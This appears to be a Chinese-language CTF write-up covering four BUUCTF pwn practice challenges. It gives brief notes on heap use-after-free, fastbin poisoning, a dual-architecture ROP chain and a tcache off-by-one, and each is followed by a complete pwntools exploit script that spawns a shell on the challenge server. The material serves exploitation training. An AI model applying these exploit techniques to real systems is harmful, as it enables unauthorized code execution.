概述
PWN-PRACTICE-BUUCTF-29
- actf_2019_babyheap
- wustctf2020_easyfast
- 强网杯2019 拟态 STKOF
- hitcon_2018_children_tcache
actf_2019_babyheap
UAF,创建两个非0x10大小的chunk,比如两个0x20
程序会创建四个chunk,大小依次为0x10,0x20,0x10,0x20
按序free掉创建的chunk,两个0x10大小的chunk形成一条链,两个0x20大小的chunk形成一条链
再创建一个0x10大小的chunk,会用到两个在fastbin中0x10大小的chunk
新创建的chunk内容为"/bin/sh"的地址和system的实际地址
最后show(0)即可system("/bin/sh")
# -*- coding:utf-8 -*-
from pwn import *
#context.log_level="debug"
#io=process("./ACTF_2019_babyheap")
io=remote("node4.buuoj.cn",27740)
elf=ELF("./ACTF_2019_babyheap")
libc=ELF("./libc-2.27-18-x64.so")
def add(size,content):
io.sendlineafter("Your choice: ","1")
io.sendlineafter("Please input size: n",str(size))
io.sendafter("Please input content: n",content)
def free(index):
io.sendlineafter("Your choice: ","2")
io.sendlineafter("Please input list index: n",str(index))
def show(index):
io.sendlineafter("Your choice: ","3")
io.sendlineafter("Please input list index: n",str(index))
system_plt=elf.plt["system"]
binsh=0x602010
add(0x20,"aaaa")#0
add(0x20,"bbbb")#1
free(0)
free(1)
add(0x10,p64(binsh)+p64(system_plt))#2
show(0)
io.interactive()
wustctf2020_easyfast
UAF,根据0x602090地址处的值来决定是否执行system("/bin/sh")
想办法在0x602090-0x10=0x602080处创建一个chunk,然后修改0x602090处的值为0
可以看到0x602088处有一个值0x50,实际上是当作fake chunk的size域
利用UAF,改写chunk的fd域,使之指向0x602080处,再创建fake chunk改写0x602090的值
# -*- coding:utf-8 -*-
from pwn import *
#context.log_level="debug"
#io=process("./wustctf2020_easyfast")
io=remote("node4.buuoj.cn",28112)
elf=ELF("./wustctf2020_easyfast")
libc=ELF("./libc-2.23-16-x64.so")
def add(size):
io.sendlineafter("choice>n","1")
io.sendlineafter("size>n",str(size))
def free(index):
io.sendlineafter("choice>n","2")
io.sendlineafter("index>n",str(index))
def edit(index,content):
io.sendlineafter("choice>n","3")
io.sendlineafter("index>n",str(index))
io.sendline(content)
def shell():
io.sendlineafter("choice>n","4")
shell_flag=0x602090
add(0x40)#0
add(0x40)#1
free(0)
edit(0,p64(shell_flag-0x10))
add(0x40)#2
add(0x40)#3
edit(3,p64(0))
shell()
io.interactive()
强网杯2019 拟态 STKOF
栈溢出,但是加了拟态防御,参考:拟态防御题型pwn&web初探
# -*- coding:utf-8 -*-
from pwn import *
from struct import pack
def payload32():
p = ''
p += pack('<I', 0x0806e9cb) # pop edx ; ret
p += pack('<I', 0x080d9060) # @ .data
p += pack('<I', 0x080a8af6) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e9cb) # pop edx ; ret
p += pack('<I', 0x080d9064) # @ .data + 4
p += pack('<I', 0x080a8af6) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e9cb) # pop edx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x08056040) # xor eax, eax ; ret
p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080d9060) # @ .data
p += pack('<I', 0x0806e9f2) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x080d9060) # padding without overwrite ebx
p += pack('<I', 0x0806e9cb) # pop edx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x08056040) # xor eax, eax ; ret
p += pack('<I', 0x080a8af6) # pop eax ; ret
p += p32(0xb)
p += pack('<I', 0x080495a3) # int 0x80
return p
def payload64():
p = ''
p += pack('<Q', 0x0000000000405895) # pop rsi ; ret
p += pack('<Q', 0x00000000006a10e0) # @ .data
p += pack('<Q', 0x000000000043b97c) # pop rax ; ret
p += '/bin//sh'
p += pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000405895) # pop rsi ; ret
p += pack('<Q', 0x00000000006a10e8) # @ .data + 8
p += pack('<Q', 0x0000000000436ed0) # xor rax, rax ; ret
p += pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004005f6) # pop rdi ; ret
p += pack('<Q', 0x00000000006a10e0) # @ .data
p += pack('<Q', 0x0000000000405895) # pop rsi ; ret
p += pack('<Q', 0x00000000006a10e8) # @ .data + 8
p += pack('<Q', 0x000000000043b9d5) # pop rdx ; ret
p += pack('<Q', 0x00000000006a10e8) # @ .data + 8
p += pack('<Q', 0x0000000000436ed0) # xor rax, rax ; ret
p += pack('<Q', 0x000000000043b97c) # pop rax ; ret
p += p64(0x3b)
p += pack('<Q', 0x00000000004011dc) # syscall
return p
io=remote("node4.buuoj.cn",25016)
add_esp=0x080a8f69 # add esp, 0xc ; ret
add_rsp=0x00000000004079d5 # add esp, 0xd8 ; ret
payload="a"*0x10C+"x00"*4+p64(add_esp)+p64(add_rsp)
payload+=payload32().ljust(0xd8,"x00")
payload+=payload64()
io.sendline(payload)
io.interactive()
hitcon_2018_children_tcache
obo + tcache,参考:HITCON_2018_children_tcache
# -*- coding:utf-8 -*-
from pwn import *
#io=process("./HITCON_2018_children_tcache")
io=remote("node4.buuoj.cn",25946)
elf=ELF("./HITCON_2018_children_tcache")
libc=ELF("./libc-2.27-18-x64.so")
def add(size,content):
io.sendlineafter("Your choice: ","1")
io.sendlineafter("Size:",str(size))
io.sendlineafter("Data:",content)
def show(index):
io.sendlineafter("Your choice: ","2")
io.sendlineafter("Index:",str(index))
def free(index):
io.sendlineafter("Your choice: ","3")
io.sendlineafter("Index:",str(index))
#gdb.attach(io)
#pause()
add(0x410,"aaaa")#0
add(0xe8,"bbbb")#1
add(0x4f0,"cccc")#2
add(0x60,"dddd")#3
#pause()
free(0)
#pause()
free(1)
#pause()
for i in range(6):
add(0xe8-i,"b"*(0xe8-i))
free(0)
#pause()
add(0xe8,"b"*0xe0+p64(0x510))#0
#pause()
free(2) #合并chunk
#pause()
add(0x410,"aaaa")#1
#pause()
show(0)
offset=0x3ebca0
leak_addr=u64(io.recvuntil("x7f")[-6:].ljust(8,"x00"))
print("leak_addr=="+hex(leak_addr))
libc_base=leak_addr-offset
print("libc_base=="+hex(libc_base))
free_hook=libc_base+libc.sym["__free_hook"]
ones=[0x4f2c5,0x4f322,0x10a38c]
one_gadget=libc_base+ones[1]
#pause()
add(0x60,"dddd")#2
#pause()
free(0)
#pause()
free(2) #double free
#pause()
add(0x60,p64(free_hook))
add(0x60,p64(free_hook))
add(0x60,p64(one_gadget))
#pause()
free(0)
io.interactive()
最后
以上就是饱满哈密瓜为你收集整理的PWN-PRACTICE-BUUCTF-29的全部内容,希望文章能够帮你解决PWN-PRACTICE-BUUCTF-29所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复